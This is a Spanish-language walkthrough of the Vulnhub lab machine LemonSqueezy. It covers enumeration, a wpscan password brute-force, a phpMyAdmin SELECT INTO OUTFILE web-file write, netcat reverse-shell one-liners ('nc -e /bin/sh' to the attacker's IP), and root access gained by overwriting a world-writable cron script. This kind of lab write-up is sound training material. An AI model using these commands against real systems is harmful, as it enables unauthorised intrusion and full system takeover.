LaCashita!

[VLN] LemonSqueezy

Hoy vamos a hackear la maquina de Vulnhub llamada LemonSqueezy. Podeis descargarla desde el siguiente enlace: LemonSqueezy

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 21:29 CEST
Nmap scan report for lemonsqueezy.home (192.168.1.10)
Host is up (0.00054s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds

Vemos que solo tiene el puerto 80 abierto, asi que vamos a profundizar un poco mas.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.10 -w 
/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.10
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/06 21:30:00 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/javascript (Status: 301)
/manual (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/05/06 21:30:03 Finished
===============================================================

Tiene un par de directorios interesantes, wordpress y phpmyadmin. Exploramos el wordpress a ver si podemos sacar algo de informacion:


sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ Â®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: 
http://192.168.1.10/wordpress/ [192.168.1.10]
[+] Started: Wed May  6 21:33:00 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] http://192.168.1.10/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
http://192.168.1.10/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
http://192.168.1.10/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 
'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 
<===============================================================================
========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been 
output.
[!] You can get a free API token with 50 daily requests by registering at 
https://wpvulndb.com/users/sign_up

[+] Finished: Wed May  6 21:33:02 2020
[+] Requests Done: 26
[+] Cached Requests: 26
[+] Data Sent: 6.488 KB
[+] Data Received: 227.2 KB
[+] Memory used: 110.84 MB
[+] Elapsed time: 00:00:01

Encontramos a los usuarios orange y lemon :) Hacemos bruteforce a la password de orange usando rockyou.


sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --passwords 
rockyou.txt --usernames orange â€“max-threads 50
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ Â®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.1.10/wordpress/ [192.168.1.10]
[+] Started: Wed May  6 21:39:55 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] http://192.168.1.10/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
http://192.168.1.10/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
http://192.168.1.10/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 
'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 
<===============================================================================
=========> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Trying orange / ginger Time: 00:00:02 
<===============================================================================
===========> (165 / 165) 100.00% Time: 00:00:02
[SUCCESS] - orange / ginger                                                     
                                                                                
     

[!] Valid Combinations Found:
 | Username: orange, Password: ginger

[!] No WPVulnDB API Token given, as a result vulnerability data has not been 
output.
[!] You can get a free API token with 50 daily requests by registering at 
https://wpvulndb.com/users/sign_up

[+] Finished: Wed May  6 21:40:18 2020
[+] Requests Done: 189
[+] Cached Requests: 26
[+] Data Sent: 90.547 KB
[+] Data Received: 104.191 KB
[+] Memory used: 930.492 MB
[+] Elapsed time: 00:00:22

Obtenemos la pass "ginger". Nos logueamos en wordpress con los credenciales de orange/ginger, en posts, hay un draft "keep this safe!" que contiene: n0t1n@w0rdl1st! Tiene pinta de ser una password :) Entramos en http://192.168.1.10/phpmyadmin/ y usamos los credenciales orange/n0t1n@w0rdl1st! para loguearnos.

Exploitation

Una vez dentro del phpmyadmin, vamos a crear un fichero "b.php" que utilizaremos para obtener una reverse shell, asi que, abrimos "console" y ponemos:


SELECT "" into outfile 
"/var/www/html/wordpress/b.php"

Ponemos nc a la escucha:


sml@Cassandra:~$ nc -nlvp 5555

Y visitamos: http://lemonsqueezy/wordpress/b.php?cmd=nc -e /bin/sh 192.168.1.148 5555

Low Shell


sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 42244
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ya estamos dentro :)

user.txt


$ cd /var/www
$ ls
html  user.txt
$ cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH

Post-Exploitation

Exploramos el sistema y vemos que tenemos permiso de escritura en /var/www/html/wordpress. Nos descargamos el fichero linpeas.sh[1] y vemos la salida a ver si nos muestra algo interesante...


$ cd /var/www/html/wordpress
$ wget 
https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scrip
ts-suite/master/linPEAS/linpeas.sh
--2020-05-28 07:04:56--  
https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scrip
ts-suite/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 
151.101.132.133
Connecting to raw.githubusercontent.com 
(raw.githubusercontent.com)|151.101.132.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 225621 (220K) [text/plain]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 220.33K  --.-KB/s    in 0.1s    

2020-05-28 07:04:56 (2.17 MB/s) - 'linpeas.sh' saved [225621/225621]

$ chmod +x linpeas.sh


----SNIP----

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*/2 *   * * *   root    /etc/logrotate.d/logrotate

----SNIP----

Privilege Escalation

Vemos que hay una tarea que se ejecuta cada 2 minutos. Se ejecuta /etc/logrotate.d/logrotate como root.... Miramos que podamos modificar el fichero:


$ ls -l /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26 14:45 /etc/logrotate.d/logrotate

Vemos que si :) Lo modificamos para obtener una reverse shell como root... Ponemos nc a la escucha:


sml@Cassandra:~$ nc -nlvp 6666

Modificamos el script, y esperamos 2 minutitos...


$ echo "#!/usr/bin/env python" > /etc/logrotate.d/logrotate
$ echo "import os" >> /etc/logrotate.d/logrotate
$ echo "os.system('nc -e /bin/sh 192.168.1.148 6666')" >> 
/etc/logrotate.d/logrotate

Y despues de la espera...


sml@Cassandra:~$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 33404
python -c 'import pty; pty.spawn("/bin/sh")'
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt


# cd /root
# ls
root.txt
# cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=

End

Y con esto ya seriamos root de la maquina :) [1]https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh